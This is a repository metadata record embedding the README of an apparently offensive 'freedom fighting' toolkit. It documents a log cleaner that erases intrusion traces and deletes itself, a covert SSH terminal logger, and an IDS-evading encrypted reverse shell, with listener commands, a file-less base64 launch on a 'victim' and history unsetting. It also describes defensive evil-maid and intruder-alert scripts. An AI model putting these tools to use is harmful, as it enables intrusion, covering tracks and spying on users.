{"id":13362818,"url":"https://github.com/JusticeRage/freedomfighting","last_synced_at":"2025-03-12T15:31:00.982Z","repository":{"id":15762548,"uuid":"78690291","full_name":"JusticeRage/freedomfighting","owner":"JusticeRage","description":"A collection of scripts which may come in handy during your freedom fighting activities.","archived":false,"fork":false,"pushed_at":"2023-05-08T15:39:48.000Z","size":114,"stargazers_count":402,"open_issues_count":1,"forks_count":66,"subscribers_count":28,"default_branch":"master","last_synced_at":"2024-05-19T06:14:43.758Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JusticeRage.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-01-11T23:44:40.000Z","updated_at":"2024-04-30T13:36:44.000Z","dependencies_parsed_at":"2024-01-07T05:58:29.981Z","dependency_job_id":"a0930350-bf72-467e-81eb-ff72161de49c","html_url":"https://github.com/JusticeRage/freedomfighting","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JusticeRage","download_url":"https://codeload.github.com/JusticeRage/freedomfighting/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243242724,"owners_count":20259809,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-29T23:01:05.225Z","updated_at":"2025-03-12T15:31:00.645Z","avatar_url":"https://github.com/JusticeRage.png","language":"Python","funding_links":[],"categories":["Python","Tools","Python (1887)"],"sub_categories":["Satellite"],"readme":"# Freedom Fighting scripts\r\n\r\nThis repository contains scripts which may come in handy during your freedom fighting activities. It will be updated\r\noccasionally, when I find myself in need of something I can't find online.\r\nEverything here is distributed under the terms of the [GPL v3 License](https://www.gnu.org/licenses/gpl.html).\r\n\r\nContributions and pull requests are very welcome.\r\n\r\n## Table of Contents\r\n\r\n- [nojail.py](#nojailpy), a python log cleaner.\r\n- [share.sh](#sharesh), a secure file sharing script.\r\n- [autojack.py](#autojackpy), a term logger.\r\n- [listurl.py](#listurlpy), a site mapper.\r\n- [ersh.py](#ershpy), an encrypted reverse shell.\r\n- [boot_check.py](#boot_checkpy), a script to detect evil-maid attacks.\r\n- [notify_hook.py](#notify_hookpy), a way to trigger alerts when some binaries are called on a system.\r\n- [Miscellaneous](#miscellaneous) (contact and donations)\r\n\r\n## nojail.py\r\n\r\nA log cleaner which removes incriminating entries in:\r\n\r\n* `/var/run/utmp`, `/var/log/wtmp`, `/var/log/btmp` (controls the output of the `who`, `w` and `last` commands)\r\n* `/var/log/lastlog` (controls the output of the `lastlog` command)\r\n* `/var/**/*.log` (.log.1, .log.2.gz, etc. included)\r\n* Any additional file or folder designated by the user\r\n\r\nEntries are deleted based on an IP address and/or associated hostname.\r\n\r\nSpecial care is taken to avoid breaking file descriptors while tampering with logs. This means logs continue to be\r\nwritten to after they've been tampered with, making the cleanup a lot less conspicuous. All the work takes place in a\r\n*tmpfs* drive and any files created are wiped securely.\r\n\r\n**Warning:** The script has only been tested on Linux and will not be able to clean UTMP entries on other Unix flavors.\r\n\r\n### Usage:\r\n```\r\nusage: nojail.py [-h] [--user USER] [--ip IP] [--hostname HOSTNAME]\r\n                    [--verbose] [--check]\r\n                    [log_files [log_files ...]]\r\n\r\n   Stealthy log file cleaner.\r\n\r\n   positional arguments:\r\n     log_files             Specify any log files to clean in addition to\r\n                           /var/**/*.log.\r\n\r\n   optional arguments:\r\n     -h, --help            show this help message and exit\r\n     --user USER, -u USER  The username to remove from the connexion logs.\r\n     --ip IP, -i IP        The IP address to remove from the logs.\r\n     --hostname HOSTNAME   The hostname of the user to wipe. Defaults to the rDNS\r\n                           of the IP.\r\n     --regexp REGEXP, -r REGEXP\r\n                           A regular expression to select log lines to delete\r\n                           (optional)\r\n\r\n     --verbose, -v         Print debug messages.\r\n     --check, -c           If present, the user will be asked to confirm each\r\n                           deletion from the logs.\r\n     --daemonize, -d       Start in the background and delete logs when the\r\n                           current session terminates. Implies --self-delete.\r\n     --self-delete, -s     Automatically delete the script after its execution.\r\n```\r\n\r\nBy default, if no arguments are given, the script will try to determine the IP address to scrub based on the\r\n`SSH_CONNECTION` environment variable. Any entry matching the reverse DNS of that IP will be removed as well.\r\n\r\n#### Basic example:\r\n\r\n```\r\n./nojail.py --user root --ip 151.80.119.32 /etc/app/logs/access.log --check\r\n```\r\n...will remove all entries for the user root where the IP address is 151.80.119.32 or the hostame is `manalyzer.org`.\r\nThe user will also be prompted before deleting each record because of the `--check` option. Finally, the file\r\n`/etc/app/logs/access.log` will be processed in addition to all the default ones.\r\n\r\nIf folders are given as positional arguments (`/etc/app/logs/` for instance), the script will recursively crawl them and\r\nclean any file with the `.log` extension (*.log.1, *.log.2.gz, etc. included).\r\n\r\n#### Regular expressions\r\n\r\nYou may want to remove arbitrary lines from the log file as well. To do so, use the `--regexp` option. For example,\r\nthe following command line will look for all POST requests to PHP files from the specified IP:\r\n\r\n```\r\n./nojail.py --ip 151.80.119.32 --regexp \"POST /.*?\\.php\"\r\n```\r\n\r\n#### Daemonizing the script\r\n\r\n```\r\n./nojail.py --daemonize\r\n```\r\nAssuming this is run from an SSH connexion, this command will delete all logs pertaining to the current user's activity\r\nwith the detected IP address and hostname right after the connexion is closed. This script will subsequently\r\nautomatically delete itself.\r\nPlease bear in mind that you won't have any opportunity to receive error messages from the application. You are encouraged\r\nto try deleting the logs once before spawning the demon to make sure that the arguments you specified are correct.\r\nIf you are in a shell with no TTY, the script will not be able to detect when the session ends. You will\r\nbe notified that the logs will be deleted in 60 seconds, and that you should log out before then (or risk creating more\r\nentries after the script has run).\r\n\r\n### Sample output:\r\n```\r\nroot@proxy:~# ./nojail.py\r\n[ ] Cleaning logs for root (XXX.XXX.XXX.XXX - domain.com).\r\n[*] 2 entries removed from /var/run/utmp!\r\n[*] 4 entries removed from /var/log/wtmp!\r\n[ ] No entries to remove from /var/log/btmp.\r\n[*] Lastlog set to 2017-01-09 17:12:49 from pts/0 at lns-bzn-XXX-XXX-XXX-XXX-XXX.adsl.proxad.net\r\n[*] 4 lines removed from /var/log/nginx/error.log!\r\n[*] 11 lines removed from /var/log/nginx/access.log!\r\n[*] 4 lines removed from /var/log/auth.log!\r\n```\r\n\r\n### Disclaimer\r\nThis script is provided without any guarantees.\r\nDon't blame me it doesn't wipe all traces of something you shouldn't have done in the first place.\r\n\r\n## share.sh\r\n\r\nA portable and secure file sharing script. While freedom fighting, it is generally not possible to scp files into\r\ncompromised machines. Alternate ways to upload files are needed, but most sharing services are either too restrictive\r\nor do not provide a way to retrieve files easily from the command line. Security considerations may also prevent\r\npeople from uploading sensitive files to cloud providers for fear that they will keep a copy of it forever.\r\n\r\nThis small and portable bash script relies on [transfer.sh](https://transfer.sh) to solve that problem. It...\r\n* Encrypts files before uploading them (symmetric AES-256-CBC).\r\n* Automatically uses `torify` if it is present on the system for increased anonimity.\r\n\r\nThe only dependencies needed are `openssl` and either `curl` or `wget`.\r\n\r\n### Usage\r\n\r\n```\r\nroot@proxy:~# ./share.sh ~/file_to_share \"My_Secure_Encryption_Key!\"\r\nSuccess! Retrieval command: ./share.sh -r file_to_share \"My_Secure_Encryption_Key!\" https://transfer.sh/BQPFz/28239\r\nroot@proxy:~# ./share.sh -r file_to_share \"My_Secure_Encryption_Key!\" https://transfer.sh/BQPFz/28239\r\nFile retrieved successfully!\r\n```\r\n\r\nAdditional arguments during the upload allow you to control the maximum number of downloads allowed for the file (`-m`)\r\nand how many days transfer.sh will keep it (`-d`). The default value for both these options is 1.\r\n\r\n**Warning**: Do not use spaces in the encryption key, or only the first word of your passphrase will be taken into\r\naccount. This is due to the way `getopts` handles arguments (I think). Pull requests are welcome if anyone is interested in\r\nfixing this.\r\n\r\n## autojack.py\r\n\r\nAutoJack is a short script leveraging EmptyMonkey's [shelljack](https://github.com/emptymonkey/shelljack) to log the \r\nterminal of any user connecting through SSH. It watches ```auth.log``` for successful\r\nconnections, figures out the PID of the user's ```bash``` process,and leaves the rest to \r\n```shelljack```.\r\n \r\nLaunch it in a _screen_, and wait until other users log-in. Their session will be\r\nlogged to ```/root/.local/sj.log.[user].[timestamp]```.\r\n \r\nThe script is not particularly stealthy (no attempt is made to hide the ```shelljack``` process) but it\r\nwill get the job done. Note that to avoid self-incrimination, the ```root``` user is not \r\ntargeted (this can be trivially commented out in the code).\r\n\r\n## listurl.py\r\n\r\nListURL is a multi-threaded website crawler which obtains a list of available pages from the target. This script is \r\nuseful for bug-bounty hunters trying to establish the attack surface of a web application.\r\n\r\n```\r\nusage: listurl.py [-h] [--max-depth MAX_DEPTH] [--threads THREADS] [--url URL]\r\n                  [--external] [--subdomains] [-c COOKIE]\r\n                  [--exclude-regexp EXCLUDE_REGEXP]\r\n                  [--show-regexp SHOW_REGEXP] [--verbose]\r\n\r\nMap a website by recursively grabbing all its URLs.\r\n\r\noptional arguments:\r\n  -h, --help            show this help message and exit\r\n  --max-depth MAX_DEPTH, -m MAX_DEPTH\r\n                        The maximum depth to crawl (default is 3).\r\n  --threads THREADS, -t THREADS\r\n                        The number of threads to use (default is 10).\r\n  --url URL, -u URL     The page to start from.\r\n  --external, -e        Follow external links (default is false).\r\n  --subdomains, -d      Include subdomains in the scope (default is false).\r\n  -c COOKIE, --cookie COOKIE\r\n                        Add a cookies to the request. May be specified\r\n                        multiple times.Example: -c \"user=admin\".\r\n  --exclude-regexp EXCLUDE_REGEXP, -r EXCLUDE_REGEXP\r\n                        A regular expression matching URLs to ignore. The\r\n                        givenexpression doesn't need to match the whole URL,\r\n                        only a partof it.\r\n  --show-regexp SHOW_REGEXP, -s SHOW_REGEXP\r\n                        A regular expression filtering displayed results. The\r\n                        given expression is searched inside the results, it\r\n                        doesn't have tomatch the whole URL. Example: \\.php$\r\n  --no-certificate-check, -n\r\n                        Disables the verification of SSL certificates.\r\n  --output-file OUTPUT_FILE, -o OUTPUT_FILE\r\n                        The file into which the obtained URLs should be\r\n                        written\r\n  --verbose, -v         Be more verbose. Can be specified multiple times.\r\n```\r\n\r\nHere is the sample output for a small website:\r\n\r\n```\r\n./listurl.py -u https://manalyzer.org\r\n[*] Started crawling at depth 1.\r\n[*] Started crawling at depth 2....\r\n[*] Started crawling at depth 3.\r\n[*] URLs discovered:\r\nhttps://manalyzer.org/report/f32d9d9ff788998234fe2b542f61ee2c (GET)\r\nhttps://manalyzer.org/report/eb4d2382c25c887ebc7775d56c417c6a (GET)\r\nhttps://manalyzer.org/report/ca127ebd958b98c55ee4ef277a1d3547 (GET)\r\nhttps://manalyzer.org/upload (POST)\r\nhttps://manalyzer.org/report/dd6762a2897432fdc7406fbd2bc2fe18 (GET)\r\nhttps://manalyzer.org/report/2fba831cab210047c7ec651ebdf63f50 (GET)\r\nhttps://manalyzer.org/report/029284d88f7b8586059ddcc71031c1f1 (GET)\r\nhttps://manalyzer.org/ (GET)\r\nhttps://manalyzer.org/report/83f3c2b72e3b98e2a72ae5fdf92c164e (GET)\r\nhttps://manalyzer.org/report/1bf9277cc045362472d1ba55e4d31dd5 (GET)\r\nhttps://manalyzer.org/report/af09bf587303feb4a9e9088b17631254 (GET)\r\nhttps://manalyzer.org/report/508d8094be65eaae4d481d40aacb2925 (GET)\r\nhttps://manalyzer.org/report/0e8592aa78d6e5a14043ab466601ef9b (GET)\r\nhttps://manalyzer.org/report/b52ddc0dda64f35721d5692e168ad58c (GET)\r\nhttps://manalyzer.org (GET)\r\nhttps://manalyzer.org/bounty (GET)\r\nhttps://manalyzer.org/search (POST)\r\n```\r\n\r\n### Filtering results\r\n\r\nThe ``--exclude-regexp`` and ``--show-regexp`` options are used to control which \r\nURLs should be shown or ignored. For instance, in the example above, you may want\r\nto ignore pages which are likely to be very similar: \r\n\r\n```\r\n./listurl.py -u https://manalyzer.org --exclude-regexp \"/report/\"\r\n   [*] Started crawling at depth 1.\r\n   [*] Started crawling at depth 2...\r\n   [*] Started crawling at depth 3.\r\n   [*] URLs discovered:\r\n   https://manalyzer.org (GET)\r\n   https://manalyzer.org/bounty (GET)\r\n   https://manalyzer.org/upload (POST)\r\n   https://manalyzer.org/search (POST)\r\n   https://manalyzer.org/ (GET)\r\n```\r\n\r\nNote that the matching URLs will *not* be crawled. This is particularly useful\r\nwhen the script gets lost in deep comment pages or repetitive content. Alternately, \r\nyou may only be interested in PHP scripts: ``./listurl.py --show-regexp \"\\.php$\"``.\r\n\r\n### Crawl parameters\r\n\r\nBy default, the crawler only goes 3 levels deep. This is something you can control\r\nwith the ``--max-depth`` option.\r\n\r\nAnother consideration is whether URLs pointing to external domains should be followed.\r\nBy default, the script doesn't, but you can enable this by setting the ``--external``\r\nswitch. If you're not interested in random external domains but still want to extend\r\nthe crawl to subdomains, you can set the ``--subdomains`` switch:\r\n\r\n```\r\n./listurl.py -u https://google.com --subdomains\r\n[*] Started crawling at depth 1.\r\n[*] Started crawling at depth 2.^C\r\nInterrupt caught! Please wait a few seconds while the threads shut down...\r\n[*] URLs discovered:\r\nhttps://drive.google.com/drive/ (GET)\r\nhttps://google.com/../../policies/privacy/example/phone-number.html (GET)\r\nhttps://play.google.com/store/books/details/Markus_Heitz_Le_Secret_de_l_eau_noire?id=Oh1rDgAAQBAJ (GET)\r\nhttps://play.google.com/store/books/details/Leslie_Kelly_Face_au_d%C3%A9sir?id=mUtyDAAAQBAJ (GET)\r\nhttps://mail.google.com/mail/?tab=Tm (GET)\r\nhttps://google.com/../../policies/privacy/example/your-activity-on-other-sites-and-apps.html (GET)\r\nhttps://google.com/locations/ (GET)\r\n[...]\r\n```\r\n\r\nNotice that if the script takes too long, you can hit CTRL+C anytime to shut\r\nit down. You'll then be shown the pages discovered so far.\r\n\r\nIf you need to access authenticated pages on a website, you can provide\r\ncookies to listurl.py from the command line with the ``--cookie`` option.\r\n\r\nFinally, if you're working on a website which has an invalid or self-signed SSL \r\ncertificate, use the `--no-certificate-check` option to ignore SSL errors.\r\n\r\n## ersh.py\r\n\r\n```ersh``` is an encrypted reverse shell written in pure Python. Ever been on a\r\nbox with no standard utilities or compilation tools, and no easy way to upload\r\nbinaries? Are you afraid than an IDS will notice an outbound shell? Accidentally\r\nclosed your netcat listener because you pressed ```^C```?\r\nSuffer no more.\r\n\r\n```ersh``` offers the following features:\r\n\r\n- SSL-encrypted with both client and server authentication (SSL as in Suck-it Snort Layer).\r\n- Fully featured TTY.\r\n- Optionnaly file-less.\r\n- No dependencies, should run on any machine with Python \u003e= 2.6.\r\n\r\nFor a more detailed discussion about how this tool came to be, please refer to\r\nthis [blog post](https://blog.kwiatkowski.fr/?q=en/ersh).\r\n\r\n### Usage\r\n\r\nThis script **needs to be edited** before it works! Look for this marker near\r\nthe beginning:\r\n\r\n```\r\n###############################################################################\r\n# EDIT THE PARAMETERS BELOW THIS LINE\r\n###############################################################################\r\n```\r\n\r\nThe ```HOST``` and ```PORT``` are self-explanatory, but you may need additional help\r\nfor the SSL certificates. Nobody wants to fight against OpenSSL's client however, so\r\nyou can just use the following one-liners:\r\n\r\n```\r\nopenssl req -new -newkey rsa:2048 -days 50 -nodes -x509 -subj \"/C=US/ST=Maryland/L=Fort Meade/O=NSA/CN=www.nsa.gov\" -keyout server.key -out server.crt \u0026\u0026 cat server.key server.crt \u003e server.pem \u0026\u0026 openssl dhparam 2048 \u003e\u003e server.pem\r\nopenssl req -new -newkey rsa:2048 -days 50 -nodes -x509 -subj \"/C=US/ST=Maryland/L=Fort Meade/O=NSA/CN=www.nsa.gov\" -keyout client.key -out client.crt\r\n```\r\n\r\nThat's it! You should now have five new files in your current folder: ```server.(crt|key|pem)```\r\nand ```client.(crt|key)```. Some of them need to be inserted in the script so\r\nthe reverse shell and the listener can authenticate each other. Specifically:\r\n\r\n- ```client_key``` should contain the contents of ```client.key```.\r\n- ```client_crt``` should contain the contents of ```client.crt```.\r\n- ```server_crt``` should contain the contents of ```server.crt```.\r\n\r\nThat's it, no more editing required.\r\n\r\n### Setting up the listener\r\n\r\nConsidering that a full TLS negociation is going to proceed, a traditional ```nc``` listener\r\nwill not suffice here. ```socat``` has been chosen for this task, due to its ability to\r\nhandle encryption and TTYs. On Debian-based distributions, you should be able to obtain\r\nit by simply running ```sudo apt-get install socat```.\r\n\r\nAssuming you're still in the folder where you generated the keys and certificates, and\r\nyou want to listen on port 443, here is the command line you should run on the\r\nmachine where the reverse shell will arrive:\r\n\r\n```\r\nsocat openssl-listen:443,reuseaddr,cert=server.pem,cafile=client.crt,method=TLS1 file:`tty`,raw,echo=0\r\n```\r\n\r\n### Running from memory\r\n\r\nYou don't need to copy the script to the remote machine for it to work. Here is a simple way to run it\r\nfrom a non-interactive shell. Copy the whole script to your clipboard and run the following commands on\r\nthe victim:\r\n\r\n```\r\npython - \u003c\u003c'EOF'\r\n[paste script contents here]\r\n'EOF'\r\n```\r\n\r\nIf you're trying to launch ```ersh.py``` from an environment which doesn't support multiple lines (such\r\nas Weevely), you can also try generating a one-liner like this:\r\n\r\n```\r\nroot@attacker:~/freedomfighting# gzip -c ersh.py | base64\r\nH4sICPMsblkAA2UucHkA1Vp5k6O4kv+fT8FUx8RULdU2PsB27asXCxh8Ajbgs2eiHocwmNMcxvjT\r\nr4Rdd0/PvNiZjV0iqgxSKpXK45cpxJef6nma1A03rMdl5kQhdnNzg4EkdWpxiRsl/l/jPM1cEyj6\r\n[...]\r\n\r\nweevely\u003e echo \"H4sICPMsblkAA2...\" | base64 -d | gunzip | python\r\n```\r\n\r\n### Sample output\r\n\r\nOn the receiver machine:\r\n\r\n```\r\nroot@attacker:~/freedomfighting# socat openssl-listen:8080,reuseaddr,cert=server.pem,cafile=client.crt,method=TLS1 file:`tty`,raw,echo=0\r\n```\r\n\r\nOn the victim:\r\n\r\n```\r\nroot@victim:~# python ersh.py\r\n[*] Connection established!\r\nroot@victim:~#\r\n```\r\n\r\nAnd on the receiver again:\r\n\r\n```\r\nroot@attacker:~/freedomfighting# socat openssl-listen:8080,reuseaddr,cert=server.pem,cafile=client.crt,method=TLS1 file:`tty`,raw,echo=0\r\nroot@victim:~# unset HISTFILE\r\nroot@victim:~#\r\n```\r\n\r\n## boot_check.py\r\n\r\nThis script was written to detect evil maid attacks. It does so by checking at\r\nboot time if the hard drive was powered on but not the OS (for instance, if it\r\nwas taken out of the computer for a copy, or if someone tried to boot the\r\nmachine but was stopped by a FDE password).\r\n\r\n### Installation:\r\n\r\nYou need to make sure this script will run at every boot. The following\r\ninstructions will work on distributions using systemd.\r\n\r\n* Copy boot_check.service to `/etc/systemd/system/`. Fix paths inside of it as needed.\r\n   The script will run as root so make sure it is not world writable!\r\n* `#\u003e systemctl enable boot_check.service`\r\n\r\nInstall dependencies:\r\n\r\n* `#\u003e apt install smartmontools dialog`\r\n\r\nRun the script once so it initializes:\r\n\r\n* `#\u003e ./boot_check.py`\r\n\r\nIf a confirmation message appears, you're good to go.\r\n\r\n### Testing\r\n\r\nIf you want to make sure that the script works, make sure you do the following:\r\n- Do not just reboot the computer, as the power to the hard drive may not be cut. \r\nTurn it off completely.\r\n- If you don't want to take out your drive and plug it into another machine, you\r\ncan try interrupting the boot process. This has to happen before the script is \r\nexecuted, but after the drive has been powered on (which means after the BIOS\r\npassword). A good moment to interrupt the boot process is when the prompt for the\r\nFDE password is shown.\r\n- Then turn on the computer again, and you should see the alert on your screen\r\na few seconds after your computer has booted up.\r\n\r\n## notify_hook.py\r\n\r\nThis script was created to provide a simple way to \"booby-trap\" certain \r\nexecutables on a linux system. The idea is to detect intruders when they use\r\ncertain binaries (`id`, `whoami`, `gcc`) on a server they don't own.\r\n\r\nTo protect those binaries, `notify_hook.py` create symbolic links to this \r\nscript higher-up in the `PATH`. `notify_hook` will then send you an alert\r\nand call the intended program in a transparent fashion. For instance, if\r\nyou want to \"protect\" `id`, just create the following symlink on your machine:\r\n\r\n```\r\nln -s path/to/notify_hook.py /usr/local/bin/id\r\n```\r\n\r\n...and all future calls to `id` should be routed through this script. This\r\nis obviously not a foolproof way to detect hackers on your systems, but it\r\nshould nonetheless catch the most careless intruders.\r\n\r\n### Customization\r\n\r\nSome programs and scripts on your system may regularly invoke some of the\r\nbinaries you wish to protect. In that case, you can edit a variable called \r\n`CALLER_WHITELIST` placed at the beginning of the script. Put the name of\r\nthose processes in the list to disable alerts from them (regular expressions\r\nare accepted).\r\n\r\nThe current notification method implemented in this script is a text message\r\nsent thtough Signal with AsamK's \r\n[signal-cli](https://github.com/AsamK/signal-cli). You'll need to install this\r\nproject separately if you want to use it, or, more likely, replace the \r\n`notify_callback` function placed on top of `notify_hook.py` with whatever\r\nsuits your needs.\r\n\r\n### Contact\r\n[![](https://manalyzer.org/static/mail.png)](justicerage@manalyzer[.]org)\r\n[![](https://manalyzer.org/static/twitter.png)](https://twitter.com/JusticeRage)\r\n[![](https://manalyzer.org/static/gpg.png)](https://pgp.mit.edu/pks/lookup?op=vindex\u0026search=0x40E9F0A8F5EA8754)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJusticeRage%2Ffreedomfighting","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FJusticeRage%2Ffreedomfighting","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJusticeRage%2Ffreedomfighting/lists"}